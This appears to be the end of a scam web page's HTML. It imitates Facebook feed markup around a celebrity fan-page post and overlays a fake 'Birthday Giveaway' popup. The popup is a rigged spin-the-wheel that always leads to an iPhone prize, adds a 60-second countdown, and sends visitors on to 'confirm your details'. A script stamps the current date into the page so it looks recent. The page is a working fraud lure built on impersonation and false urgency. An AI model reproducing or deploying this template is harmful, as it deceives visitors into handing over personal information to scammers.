                                                                href="/RobertDowneyJrBrazil/photos/a.402453273146793.89622.398414730217314/1191456267579819/?type=3&amp;fs=1&amp;refid=8&amp;_ft_=qid.6329709165628833554%3Amf_story_key.-2286654974156704102"
                                                                data-sigil="feed-ufi-focus feed-ufi-trigger ufiCommentLink mufi-composer-focus">Comments</a>
                        </div>
                        <div class="_52jj _15kl _3hwk _4g34"><a class="_15kr _5a-2"
                                                                data-store="{&quot;reshare_post&quot;:false,&quot;share_id&quot;:1191456267579819,&quot;feedback_source&quot;:1,&quot;feedback_referrer&quot;:null,&quot;internal_preview_image_id&quot;:null,&quot;behavior&quot;:&quot;custom&quot;}"
                                                                href="/sharer.php?fs=1&amp;sid=1191456267579819&amp;refid=8&amp;_ft_=qid.6329709165628833554%3Amf_story_key.-2286654974156704102"
                                                                data-sigil="share-popup">Share</a></div>
                    </div>
                </div>
            </footer>

        </div>
        <ul>
        </ul>
    </div>
</div>

<div class="popupCover">
<div class="box active" id="first">
<div class="title">
CONGRATULATIONS!<br><br>
You are selected for our exclusive '5th Birthday Giveaway' where our loyal users get a chance to win great
Apple prizes!<br><br>
Click OK to spin the wheel!
</div>
<button class="button">OK</button>
</div>
<div class="box" id="second">
<div class="title">
Sorry :(<br>
you roll nothing.<br><br>
You have (1) more spin!
</div>
<button class="button">SPIN AGAIN</button>
</div>
<div class="box" id="third">
<div class="title">Congratulation!<br>You are just one step away from your new iPhone 7</div>
<img src="iphoneCongratz.png"><br>
<div class="text">
This offer is valid for <span>60</span> seconds
</div>
<button class="button">Claim your iPhone here</button>
</div>
<div class="box" id="last">
<div class="title">
Last Step!
</div>
<div class="text">
Confirm your details in the next page!<br><br>
(IMPORTANT!)
</div>
<button class="button">OK</button>
</div>
</div>

<script src="core.min.js"></script>
<script type="text/javascript">

    var myDate = new Date();
    var M = myDate.getMonth();
    var day = myDate.getDate();
    var time = document.getElementById("time");
    time.innerHTML = "Sep " + day;
</script>

</body>
</html>